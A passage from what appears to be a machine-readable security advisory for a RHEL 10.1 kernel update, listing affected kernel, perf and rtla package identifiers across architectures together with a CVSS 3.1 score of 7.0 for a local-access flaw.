"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
